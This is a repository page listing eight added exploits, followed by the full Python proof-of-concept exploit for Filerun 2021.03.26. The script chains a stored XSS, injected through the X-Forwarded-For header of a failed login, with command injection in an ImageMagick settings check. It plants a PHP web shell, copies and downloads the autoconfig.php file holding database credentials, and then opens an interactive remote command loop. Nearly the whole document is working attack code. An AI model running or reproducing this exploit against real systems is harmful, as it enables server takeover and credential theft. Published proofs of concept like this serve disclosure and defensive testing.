f449a4864b
8 changes to exploits/shellcodes TotalAV 5.15.69 - Unquoted Service Path Simple Attendance System 1.0 - Unauthenticated Blind SQLi Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected) Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated) Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
76 lines
No EOL
6.3 KiB
Python
Executable file
76 lines
No EOL
6.3 KiB
Python
Executable file
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 09/21/2021
|
|
# Exploit Author: syntegris information solutions GmbH
|
|
# Credits: Christian P.
|
|
# Vendor Homepage: https://filerun.com
|
|
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
|
|
# Version: 2021.03.26
|
|
# Tested on: official docker image
|
|
|
|
|
|
# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
|
|
import requests
|
|
import time
|
|
import sys
|
|
|
|
# this is the plain version of the payload below
|
|
"""
|
|
var xmlhttp = new XMLHttpRequest();
|
|
var url = '/?module=cpanel§ion=settings&page=image_preview&action=checkImageMagick'
|
|
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #";
|
|
xmlhttp.onreadystatechange = function() {
|
|
if (xmlhttp.readyState == XMLHttpRequest.DONE) {
|
|
if (xmlhttp.status == 200) {
|
|
console.log(xmlhttp.responseText);
|
|
}
|
|
}
|
|
};
|
|
xmlhttp.open("POST", url, true);
|
|
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
|
xmlhttp.send("mode=exec&path=convert|"+payload);
|
|
"""
|
|
|
|
if not len(sys.argv) == 2:
|
|
print("missing target url")
|
|
sys.exit(1)
|
|
|
|
target = sys.argv[1]
|
|
|
|
|
|
def inject_code():
|
|
payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"
|
|
req = requests.post(
|
|
"%s/?module=fileman&page=login&action=login" % target,
|
|
data={'username': 'nonexistend', 'password': 'wrong', 'otp':'',
|
|
'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
|
|
)
|
|
|
|
|
|
def check_shell_exists():
|
|
req = requests.get("%s/shell.php" % target)
|
|
if req.status_code != 200:
|
|
return False
|
|
return True
|
|
|
|
def process_command(command):
|
|
req = requests.get("%s/shell.php?cmd=%s" % (target, command))
|
|
print(req.text)
|
|
|
|
while True:
|
|
print("Injecting new log message...")
|
|
inject_code()
|
|
time.sleep(10)
|
|
if check_shell_exists():
|
|
print("Shell exists under '%s/shell.php?cmd=ls'" % target)
|
|
break
|
|
print("Lets get autoconfig.php which contains database credentials...")
|
|
process_command("cp system/data/autoconfig.php js/autoconfig.txt")
|
|
|
|
ac_resp = requests.get("%s/js/autoconfig.txt" % target)
|
|
with open("filerun.autoconfig.php", "wb") as ac_f:
|
|
ac_f.write(ac_resp.content)
|
|
process_command("rm js/autoconfig.php")
|
|
|
|
while True:
|
|
command = input("Command:")
|
|
process_command(command) |